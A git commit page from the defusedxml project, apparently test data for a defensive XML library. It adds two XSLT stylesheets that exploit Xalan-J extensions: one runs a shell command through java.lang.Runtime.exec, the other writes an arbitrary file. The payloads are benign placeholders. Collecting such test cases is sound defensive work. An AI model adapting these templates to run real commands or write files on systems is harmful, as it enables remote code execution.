summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorChristian Heimes <christian@cheimes.de>2013-03-07 22:03:36 +0100
committerChristian Heimes <christian@cheimes.de>2013-03-07 22:03:36 +0100
commitfb7ba65f46a11b2e230f0fba9497aa8268a6e6b6 (patch)
tree48e6fc95b61ef2feaed897abcd25826fb0d7e33e
parentb420d4338f2a1daab7c9d89b8bb696b988993f9e (diff)
downloaddefusedxml-fb7ba65f46a11b2e230f0fba9497aa8268a6e6b6.tar.gz
add two working xalan exploits
Diffstat
-rw-r--r--xmltestdata/xalan_exec.xsl20
-rw-r--r--xmltestdata/xalan_write.xsl18
2 files changed, 38 insertions, 0 deletions
diff --git a/xmltestdata/xalan_exec.xsl b/xmltestdata/xalan_exec.xsl
new file mode 100644
index 0000000..b06c59a
--- /dev/null
+++ b/xmltestdata/xalan_exec.xsl
@@ -0,0 +1,20 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_exec.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
+ xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+ exclude-result-prefixes="rt ob">
+ <xsl:template match="/">
+ <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
+ <xsl:variable name="command"
+ select="rt:exec($runtimeObject, &apos;/usr/bin/notify-send SomethingBadHappensHere&apos;)"/>
+ <xsl:variable name="commandAsString" select="ob:toString($command)"/>
+ <xsl:value-of select="$commandAsString"/>
+ </xsl:template>
+</xsl:stylesheet>
+
diff --git a/xmltestdata/xalan_write.xsl b/xmltestdata/xalan_write.xsl
new file mode 100644
index 0000000..56d35b9
--- /dev/null
+++ b/xmltestdata/xalan_write.xsl
@@ -0,0 +1,18 @@
+<!-- Tested with xalan-j_2_7_1-bin.zip, Xerces-J-bin.2.11.0.tar.gz on
+ OpenJDK 1.7.0_15
+
+ $ LC_ALL=C java -cp xalan.jar:serializer.jar:xercesImpl.jar:xml-apis.jar \
+ org.apache.xalan.xslt.Process -in simple.xml -xsl xalan_write.xsl
+-->
+<xsl:stylesheet version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:redirect="http://xml.apache.org/xalan/redirect"
+ extension-element-prefixes="redirect">
+ <xsl:output omit-xml-declaration="yes" indent="yes"/>
+ <xsl:template match="/">
+ <redirect:write file="xalan_redirect.txt" method="text">
+ <xsl:text>Something bad happens here!&#13;</xsl:text>
+ </redirect:write>
+ </xsl:template>
+</xsl:stylesheet>
+
View Lorry Controller Status